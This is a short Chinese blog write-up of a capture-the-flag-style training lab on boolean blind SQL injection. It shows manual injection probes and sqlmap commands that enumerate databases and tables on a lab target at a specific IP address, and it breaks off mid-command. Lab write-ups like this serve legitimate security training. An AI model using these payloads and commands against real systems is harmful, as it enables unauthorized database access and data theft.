墨者学院—SQL注入漏洞测试(布尔盲注)

靶场地址:SQL注入漏洞测试(布尔盲注)_SQL注入_在线靶场_墨者学院_专注于网络安全人才培养
 

打开靶场

 
我们先判断注入点,通过and 1 = 1和and 1 = 2来判断

 

发现页面存在注入点,且是数字型注入,但是id不为1时则没有任何回显,那我们只能判定是布尔盲注。
构造语句来证明我的想法
and length(database())= 10
发现页面在数据库长度为10的条件下回显正常,那么就证明了该点确实是存在布尔盲注的,为了节约时间我们放到sqlmap去跑(也可以进行手注)

查询数据库名:
sqlmap -u "http://124.70.71.251:48086/new_list.php?id=1" --dbs

 

查询stormgroup数据下的表:
sqlmap -u "http://124.70.71.251:48086/new_list.php?id=1" -D stormgroup --tables

查看member下的列:
sqlmap

墨者学院—SQL注入漏洞测试(布尔盲注)最先出现在Python成神之路

版权声明:
作者:Zad
链接:https://www.techfm.club/p/25747.html
来源:TechFM
文章版权归作者所有,未经允许请勿转载。

THE END
分享
二维码
< <上一篇
下一篇>>